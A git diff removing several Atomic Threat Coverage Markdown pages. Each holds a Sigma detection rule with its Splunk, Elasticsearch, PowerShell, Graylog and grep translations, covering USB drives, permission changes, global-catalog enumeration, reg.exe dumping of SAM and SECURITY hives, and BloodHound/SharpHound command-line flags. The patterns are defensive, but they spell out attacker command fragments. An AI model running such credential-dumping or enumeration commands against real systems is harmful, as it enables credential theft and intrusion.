-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f69a87ea-955e-4fb4-adb2-bb9fd6685632 <<EOF
-{
-  "metadata": {
-    "title": "External Disk Drive or USB Storage Device",
-    "description": "Detects external diskdrives or plugged in USB devices",
-    "tags": [
-      "attack.t1091",
-      "attack.t1200",
-      "attack.lateral_movement",
-      "attack.initial_access"
-    ],
-    "query": "(winlog.channel:\"Security\" AND ((winlog.event_id:(\"6416\") AND DeviceClassName:\"DiskDrive\") OR DeviceDescription:\"USB\\ Mass\\ Storage\\ Device\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND ((winlog.event_id:(\"6416\") AND DeviceClassName:\"DiskDrive\") OR DeviceDescription:\"USB\\ Mass\\ Storage\\ Device\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'External Disk Drive or USB Storage Device'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:("6416") AND DeviceClassName:"DiskDrive") OR DeviceDescription:"USB Mass Storage Device")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (((EventCode="6416") DeviceClassName="DiskDrive") OR DeviceDescription="USB Mass Storage Device"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" ((event_id IN ["6416"] DeviceClassName="DiskDrive") OR DeviceDescription="USB Mass Storage Device"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*(?:.*6416))(?=.*DiskDrive))|.*USB Mass Storage Device))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_file_permission_modifications.md b/Atomic_Threat_Coverage/Detection_Rules/win_file_permission_modifications.md
deleted file mode 100644
index 6d1cd07..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_file_permission_modifications.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | File or Folder Permissions Modifications       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a file or folder permissions modifications |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1222: File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Users interacting with the files on their own (unlikely unless power users)</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.yaml)</li></ul>  |
-| **Author**               | Jakob Weinzettl, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: File or Folder Permissions Modifications
-id: 37ae075c-271b-459b-8d7b-55ad5f993dd8
-status: experimental
-description: Detects a file or folder permissions modifications
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.yaml
-author: Jakob Weinzettl, oscd.community
-date: 2019/10/23
-modified: 2019/11/08
-tags:
-    - attack.defense_evasion
-    - attack.t1222
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-      - Image|endswith: 
-          - '\takeown.exe'
-          - '\cacls.exe'
-          - '\icacls.exe'
-        CommandLine|contains: '/grant'
-      - Image|endswith: '\attrib.exe'
-        CommandLine|contains: '-r'
-    condition: selection
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - Users interacting with the files on their own (unlikely unless power users)
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ((($_.message -match "Image.*.*\\takeown.exe" -or $_.message -match "Image.*.*\\cacls.exe" -or $_.message -match "Image.*.*\\icacls.exe") -and $_.message -match "CommandLine.*.*/grant.*") -or ($_.message -match "Image.*.*\\attrib.exe" -and $_.message -match "CommandLine.*.*-r.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:(*\\takeown.exe OR *\\cacls.exe OR *\\icacls.exe) AND winlog.event_data.CommandLine.keyword:*\/grant*) OR (winlog.event_data.Image.keyword:*\\attrib.exe AND winlog.event_data.CommandLine.keyword:*\-r*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/37ae075c-271b-459b-8d7b-55ad5f993dd8 <<EOF
-{
-  "metadata": {
-    "title": "File or Folder Permissions Modifications",
-    "description": "Detects a file or folder permissions modifications",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1222"
-    ],
-    "query": "((winlog.event_data.Image.keyword:(*\\\\takeown.exe OR *\\\\cacls.exe OR *\\\\icacls.exe) AND winlog.event_data.CommandLine.keyword:*\\/grant*) OR (winlog.event_data.Image.keyword:*\\\\attrib.exe AND winlog.event_data.CommandLine.keyword:*\\-r*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:(*\\\\takeown.exe OR *\\\\cacls.exe OR *\\\\icacls.exe) AND winlog.event_data.CommandLine.keyword:*\\/grant*) OR (winlog.event_data.Image.keyword:*\\\\attrib.exe AND winlog.event_data.CommandLine.keyword:*\\-r*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'File or Folder Permissions Modifications'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:(*\\takeown.exe *\\cacls.exe *\\icacls.exe) AND CommandLine.keyword:*\/grant*) OR (Image.keyword:*\\attrib.exe AND CommandLine.keyword:*\-r*))
-```
-
-
-### splunk
-    
-```
-(((Image="*\\takeown.exe" OR Image="*\\cacls.exe" OR Image="*\\icacls.exe") CommandLine="*/grant*") OR (Image="*\\attrib.exe" CommandLine="*-r*")) | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((Image IN ["*\\takeown.exe", "*\\cacls.exe", "*\\icacls.exe"] CommandLine="*/grant*") OR (Image="*\\attrib.exe" CommandLine="*-r*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*(?:.*.*\takeown\.exe|.*.*\cacls\.exe|.*.*\icacls\.exe))(?=.*.*/grant.*))|.*(?:.*(?=.*.*\attrib\.exe)(?=.*.*-r.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_global_catalog_enumeration.md b/Atomic_Threat_Coverage/Detection_Rules/win_global_catalog_enumeration.md
deleted file mode 100644
index 200b3ec..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_global_catalog_enumeration.md
+++ /dev/null
@@ -1,188 +0,0 @@
-| Title                    | Enumeration via the Global Catalog       |
-|:-------------------------|:------------------|
-| **Description**          | Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Treshhold according to domain width. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1087: Account Discovery](https://attack.mitre.org/techniques/T1087)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Exclude known DCs.</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Chakib Gzenayi (@Chak092), Hosni Mribah |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Enumeration via the Global Catalog 
-description: Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Treshhold according to domain width.
-author: Chakib Gzenayi (@Chak092), Hosni Mribah
-id: 619b020f-0fd7-4f23-87db-3f51ef837a34
-date: 2020/05/11
-tags:
-    - attack.discovery
-    - attack.t1087
-logsource:
-    product: windows
-    service: system
-    description: 'The advanced audit policy setting "Windows Filtering Platform > Filtering Platform Connection" must be configured for Success'
-detection:
-    selection:
-        EventID: 5156
-        DestinationPort:
-        - 3268
-        - 3269
-    timeframe: 1h
-    condition: selection | count() by SourceAddress > 2000
-falsepositives:
-    - Exclude known DCs.
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "5156" -and ($_.message -match "3268" -or $_.message -match "3269")) }  | group-object SourceAddress | where { $_.count -gt 2000 } | select name,count | sort -desc
-```
-
-
-### es-qs
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_global_catalog_enumeration.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/619b020f-0fd7-4f23-87db-3f51ef837a34 <<EOF
-{
-  "metadata": {
-    "title": "Enumeration via the Global Catalog",
-    "description": "Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Treshhold according to domain width.",
-    "tags": [
-      "attack.discovery",
-      "attack.t1087"
-    ],
-    "query": "(winlog.event_id:\"5156\" AND winlog.event_data.DestinationPort:(\"3268\" OR \"3269\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "1h"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"5156\" AND winlog.event_data.DestinationPort:(\"3268\" OR \"3269\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          },
-          "aggs": {
-            "by": {
-              "terms": {
-                "field": "SourceAddress",
-                "size": 10,
-                "order": {
-                  "_count": "desc"
-                },
-                "min_doc_count": 2001
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.aggregations.by.buckets.0.doc_count": {
-        "gt": 2000
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Enumeration via the Global Catalog'",
-        "body": "Hits:\n{{#aggregations.by.buckets}}\n {{key}} {{doc_count}}\n{{/aggregations.by.buckets}}\n",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_global_catalog_enumeration.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="5156" (DestinationPort="3268" OR DestinationPort="3269")) | eventstats count as val by SourceAddress| search val > 2000
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="5156" DestinationPort IN ["3268", "3269"]) | chart count() as val by SourceAddress | search val > 2000
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*5156)(?=.*(?:.*3268|.*3269)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_grabbing_sensitive_hives_via_reg.md b/Atomic_Threat_Coverage/Detection_Rules/win_grabbing_sensitive_hives_via_reg.md
deleted file mode 100644
index 10a1279..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_grabbing_sensitive_hives_via_reg.md
+++ /dev/null
@@ -1,190 +0,0 @@
-| Title                    | Grabbing Sensitive Hives via Reg Utility       |
-|:-------------------------|:------------------|
-| **Description**          | Dump sam, system or security hives using REG.exe utility |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Dumping hives for legitimate purpouse i.e. backup or forensic investigation</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html](https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html)</li><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md)</li></ul>  |
-| **Author**               | Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community |
-| Other Tags           | <ul><li>car.2013-07-001</li><li>attack.t1003.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Grabbing Sensitive Hives via Reg Utility
-id: fd877b94-9bb5-4191-bb25-d79cbd93c167
-description: Dump sam, system or security hives using REG.exe utility
-author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community
-date: 2019/10/22
-references:
-    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-    - https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - car.2013-07-001
-    - attack.t1003.002
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_1:
-        Image: '*\reg.exe'
-        CommandLine|contains:
-            - 'save'
-            - 'export'
-    selection_2:
-        CommandLine|contains:
-            - 'hklm'
-            - 'hkey_local_machine'
-    selection_3:
-        CommandLine|endswith:
-            - '\system'
-            - '\sam'
-            - '\security'
-    condition: selection_1 and selection_2 and selection_3
-falsepositives:
-    - Dumping hives for legitimate purpouse i.e. backup or forensic investigation
-level: medium
-status: experimental
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\reg.exe" -and ($_.message -match "CommandLine.*.*save.*" -or $_.message -match "CommandLine.*.*export.*") -and ($_.message -match "CommandLine.*.*hklm.*" -or $_.message -match "CommandLine.*.*hkey_local_machine.*") -and ($_.message -match "CommandLine.*.*\\system" -or $_.message -match "CommandLine.*.*\\sam" -or $_.message -match "CommandLine.*.*\\security")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\reg.exe AND winlog.event_data.CommandLine.keyword:(*save* OR *export*) AND winlog.event_data.CommandLine.keyword:(*hklm* OR *hkey_local_machine*) AND winlog.event_data.CommandLine.keyword:(*\\system OR *\\sam OR *\\security))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/fd877b94-9bb5-4191-bb25-d79cbd93c167 <<EOF
-{
-  "metadata": {
-    "title": "Grabbing Sensitive Hives via Reg Utility",
-    "description": "Dump sam, system or security hives using REG.exe utility",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "car.2013-07-001",
-      "attack.t1003.002"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\reg.exe AND winlog.event_data.CommandLine.keyword:(*save* OR *export*) AND winlog.event_data.CommandLine.keyword:(*hklm* OR *hkey_local_machine*) AND winlog.event_data.CommandLine.keyword:(*\\\\system OR *\\\\sam OR *\\\\security))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\reg.exe AND winlog.event_data.CommandLine.keyword:(*save* OR *export*) AND winlog.event_data.CommandLine.keyword:(*hklm* OR *hkey_local_machine*) AND winlog.event_data.CommandLine.keyword:(*\\\\system OR *\\\\sam OR *\\\\security))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Grabbing Sensitive Hives via Reg Utility'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\reg.exe AND CommandLine.keyword:(*save* *export*) AND CommandLine.keyword:(*hklm* *hkey_local_machine*) AND CommandLine.keyword:(*\\system *\\sam *\\security))
-```
-
-
-### splunk
-    
-```
-(Image="*\\reg.exe" (CommandLine="*save*" OR CommandLine="*export*") (CommandLine="*hklm*" OR CommandLine="*hkey_local_machine*") (CommandLine="*\\system" OR CommandLine="*\\sam" OR CommandLine="*\\security"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\reg.exe" CommandLine IN ["*save*", "*export*"] CommandLine IN ["*hklm*", "*hkey_local_machine*"] CommandLine IN ["*\\system", "*\\sam", "*\\security"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\reg\.exe)(?=.*(?:.*.*save.*|.*.*export.*))(?=.*(?:.*.*hklm.*|.*.*hkey_local_machine.*))(?=.*(?:.*.*\system|.*.*\sam|.*.*\security)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_hack_bloodhound.md b/Atomic_Threat_Coverage/Detection_Rules/win_hack_bloodhound.md
deleted file mode 100644
index 2278253..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_hack_bloodhound.md
+++ /dev/null
@@ -1,190 +0,0 @@
-| Title                    | Bloodhound and Sharphound Hack Tool       |
-|:-------------------------|:------------------|
-| **Description**          | Detects command line parameters used by Bloodhound and Sharphound hack tools |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1087: Account Discovery](https://attack.mitre.org/techniques/T1087)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Other programs that use these command line option and accepts an 'All' parameter</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://github.com/BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound)</li><li>[https://github.com/BloodHoundAD/SharpHound](https://github.com/BloodHoundAD/SharpHound)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Bloodhound and Sharphound Hack Tool
-id: f376c8a7-a2d0-4ddc-aa0c-16c17236d962
-description: Detects command line parameters used by Bloodhound and Sharphound hack tools
-author: Florian Roth
-references:
-    - https://github.com/BloodHoundAD/BloodHound
-    - https://github.com/BloodHoundAD/SharpHound
-date: 2019/12/20
-modified: 2019/12/21
-tags:
-    - attack.discovery
-    - attack.t1087
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1: 
-        Image|contains: 
-            - '\Bloodhound.exe'
-            - '\SharpHound.exe'
-    selection2:
-        CommandLine|contains: 
-            - ' -CollectionMethod All '
-            - '.exe -c All -d '
-            - 'Invoke-Bloodhound'
-            - 'Get-BloodHoundData'
-    selection3:
-        CommandLine|contains|all: 
-            - ' -JsonFolder '
-            - ' -ZipFileName '
-    selection4:
-        CommandLine|contains|all: 
-            - ' DCOnly '
-            - ' --NoSaveCache '
-    condition: 1 of them
-falsepositives:
-    - Other programs that use these command line option and accepts an 'All' parameter
-level: high
-
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "Image.*.*\\Bloodhound.exe.*" -or $_.message -match "Image.*.*\\SharpHound.exe.*") -or ($_.message -match "CommandLine.*.* -CollectionMethod All .*" -or $_.message -match "CommandLine.*.*.exe -c All -d .*" -or $_.message -match "CommandLine.*.*Invoke-Bloodhound.*" -or $_.message -match "CommandLine.*.*Get-BloodHoundData.*") -or ($_.message -match "CommandLine.*.* -JsonFolder .*" -and $_.message -match "CommandLine.*.* -ZipFileName .*") -or ($_.message -match "CommandLine.*.* DCOnly .*" -and $_.message -match "CommandLine.*.* --NoSaveCache .*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\Bloodhound.exe* OR *\\SharpHound.exe*) OR winlog.event_data.CommandLine.keyword:(*\ \-CollectionMethod\ All\ * OR *.exe\ \-c\ All\ \-d\ * OR *Invoke\-Bloodhound* OR *Get\-BloodHoundData*) OR (winlog.event_data.CommandLine.keyword:*\ \-JsonFolder\ * AND winlog.event_data.CommandLine.keyword:*\ \-ZipFileName\ *) OR (winlog.event_data.CommandLine.keyword:*\ DCOnly\ * AND winlog.event_data.CommandLine.keyword:*\ \-\-NoSaveCache\ *))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f376c8a7-a2d0-4ddc-aa0c-16c17236d962 <<EOF
-{
-  "metadata": {
-    "title": "Bloodhound and Sharphound Hack Tool",
-    "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools",
-    "tags": [
-      "attack.discovery",
-      "attack.t1087"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\Bloodhound.exe* OR *\\\\SharpHound.exe*) OR winlog.event_data.CommandLine.keyword:(*\\ \\-CollectionMethod\\ All\\ * OR *.exe\\ \\-c\\ All\\ \\-d\\ * OR *Invoke\\-Bloodhound* OR *Get\\-BloodHoundData*) OR (winlog.event_data.CommandLine.keyword:*\\ \\-JsonFolder\\ * AND winlog.event_data.CommandLine.keyword:*\\ \\-ZipFileName\\ *) OR (winlog.event_data.CommandLine.keyword:*\\ DCOnly\\ * AND winlog.event_data.CommandLine.keyword:*\\ \\-\\-NoSaveCache\\ *))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\Bloodhound.exe* OR *\\\\SharpHound.exe*) OR winlog.event_data.CommandLine.keyword:(*\\ \\-CollectionMethod\\ All\\ * OR *.exe\\ \\-c\\ All\\ \\-d\\ * OR *Invoke\\-Bloodhound* OR *Get\\-BloodHoundData*) OR (winlog.event_data.CommandLine.keyword:*\\ \\-JsonFolder\\ * AND winlog.event_data.CommandLine.keyword:*\\ \\-ZipFileName\\ *) OR (winlog.event_data.CommandLine.keyword:*\\ DCOnly\\ * AND winlog.event_data.CommandLine.keyword:*\\ \\-\\-NoSaveCache\\ *))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Bloodhound and Sharphound Hack Tool'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\Bloodhound.exe* *\\SharpHound.exe*) OR CommandLine.keyword:(* \-CollectionMethod All * *.exe \-c All \-d * *Invoke\-Bloodhound* *Get\-BloodHoundData*) OR (CommandLine.keyword:* \-JsonFolder * AND CommandLine.keyword:* \-ZipFileName *) OR (CommandLine.keyword:* DCOnly * AND CommandLine.keyword:* \-\-NoSaveCache *))
-```
-
-
-### splunk
-    
-```
-((Image="*\\Bloodhound.exe*" OR Image="*\\SharpHound.exe*") OR (CommandLine="* -CollectionMethod All *" OR CommandLine="*.exe -c All -d *" OR CommandLine="*Invoke-Bloodhound*" OR CommandLine="*Get-BloodHoundData*") OR (CommandLine="* -JsonFolder *" CommandLine="* -ZipFileName *") OR (CommandLine="* DCOnly *" CommandLine="* --NoSaveCache *"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image IN ["*\\Bloodhound.exe*", "*\\SharpHound.exe*"] OR CommandLine IN ["* -CollectionMethod All *", "*.exe -c All -d *", "*Invoke-Bloodhound*", "*Get-BloodHoundData*"] OR (CommandLine="* -JsonFolder *" CommandLine="* -ZipFileName *") OR (CommandLine="* DCOnly *" CommandLine="* --NoSaveCache *")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*.*\Bloodhound\.exe.*|.*.*\SharpHound\.exe.*)|.*(?:.*.* -CollectionMethod All .*|.*.*\.exe -c All -d .*|.*.*Invoke-Bloodhound.*|.*.*Get-BloodHoundData.*)|.*(?:.*(?=.*.* -JsonFolder .*)(?=.*.* -ZipFileName .*))|.*(?:.*(?=.*.* DCOnly .*)(?=.*.* --NoSaveCache .*))))'
-```
-
-
-
